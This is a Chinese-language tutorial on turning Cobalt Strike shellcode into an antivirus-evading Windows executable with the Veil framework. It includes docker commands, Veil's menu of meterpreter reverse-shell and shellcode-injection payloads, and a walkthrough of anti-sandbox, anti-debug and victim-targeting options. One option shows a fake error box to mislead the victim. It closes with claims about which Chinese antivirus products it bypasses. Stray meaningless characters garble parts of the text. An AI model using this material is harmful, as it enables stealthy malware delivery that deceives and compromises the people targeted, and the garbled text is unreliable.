一照激、CS生成shellcode

攻擊-生成后門-payload generator-選veil

二恭取、安裝veil

安裝docker pull mattiasohlsson/veil
啟動docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
生成的exe文件在/tmp/veil-output，之后在這取

三通危、veil免殺

[*] Available Tools:
    1)  Evasion
    2)  Ordnance

use 1

[*] Available Payloads:

    1)  autoit/shellcode_inject/flat.py

    2)  auxiliary/coldwar_wrapper.py
    3)  auxiliary/macro_converter.py
    4)  auxiliary/pyinstaller_wrapper.py

    5)  c/meterpreter/rev_http.py
    6)  c/meterpreter/rev_http_service.py
    7)  c/meterpreter/rev_tcp.py
    8)  c/meterpreter/rev_tcp_service.py

    9)  cs/meterpreter/rev_http.py
    10) cs/meterpreter/rev_https.py
    11) cs/meterpreter/rev_tcp.py
    12) cs/shellcode_inject/base64.py
    13) cs/shellcode_inject/virtual.py

    14) go/meterpreter/rev_http.py
    15) go/meterpreter/rev_https.py
    16) go/meterpreter/rev_tcp.py
    17) go/shellcode_inject/virtual.py

    18) lua/shellcode_inject/flat.py

    19) perl/shellcode_inject/flat.py

use 17

BADMACS 設(shè)置為Y表示 查看運(yùn)行環(huán)境的MAC地址如果不是虛擬機(jī)才會執(zhí)行payload （反調(diào)試）
CLICKTRACK 設(shè)置為4表示 表示需要4次點(diǎn)擊才會執(zhí)行
CURSORCHECK 設(shè)置為100表示 運(yùn)行環(huán)境的硬盤大小如果大于100GB才會執(zhí)行payload （反沙箱）
COMPILE_TO_EXE 設(shè)置為Y表示 編譯為exe文件
HOSTNAME 設(shè)置為Comp1表示 只有在Hostname計算機(jī)名為Comp1時才會執(zhí)行payload（指定目標(biāo)環(huán)境 反沙箱的方式）
INJECT_METHOD 可設(shè)置為Virtual 或 Heap
MINPROCS 設(shè)置為20表示 只有運(yùn)行環(huán)境的運(yùn)行進(jìn)程數(shù)大于20時才會執(zhí)行payload（指定目標(biāo)環(huán)境 反沙箱的方式）
PROCCHECK 設(shè)置為Y表示 只有運(yùn)行環(huán)境的進(jìn)程中沒有虛擬機(jī)進(jìn)程時才會執(zhí)行payload（指定目標(biāo)環(huán)境 反沙箱的方式）
PROCESSORS 設(shè)置為2表示 只在至少2核的機(jī)器中才會執(zhí)行payload（指定目標(biāo)環(huán)境 反沙箱的方式）
RAMCHECK 設(shè)置為Y表示 只在運(yùn)行環(huán)境的內(nèi)存為3G以上時才會執(zhí)行payload（指定目標(biāo)環(huán)境 反沙箱的方式）
SLEEP 設(shè)置為10表示 休眠10秒 以檢測是否運(yùn)行過程中被加速（反沙箱）
USERNAME 設(shè)置為Tom表示 只有在當(dāng)前用戶名為Tom的機(jī)器中才執(zhí)行payload抡笼。
USERPROMPT 設(shè)置為Y表示 在injection之前提醒用戶（提示一個錯誤框，讓用戶誤以為該程序執(zhí)行錯誤才無法打開）
DEBUGGER 設(shè)置為Y表示 當(dāng)被調(diào)試器不被attached時才會執(zhí)行payload （反調(diào)試）
DOMAIN 設(shè)置為Comp表示 受害者計算機(jī)只有加入Comp域中時黄鳍，才會執(zhí)行payload（指定目標(biāo)環(huán)境 反沙箱的方式）
UTCCHECK 設(shè)置為Y表示 只在運(yùn)行環(huán)境的系統(tǒng)使用UTC時間時推姻，才會執(zhí)行payload

set 都是可選的，都為了繞過框沟，不選也行

generate(生成)

復(fù)制CS生成的payload.txt內(nèi)容藏古，到這個位置

輸入文件名

去這找生成的exe文件，/tmp/veil-output

四忍燥、結(jié)論

win7：隨便過
win10：此種免殺可以過360拧晕、火絨、qq管家等殺軟梅垄，但是過不了windwos defender厂捞？？队丝，然而安裝了360靡馁、火絨、qq管家等殺軟會把win10的defender擠掉机久，所以也能過臭墨？？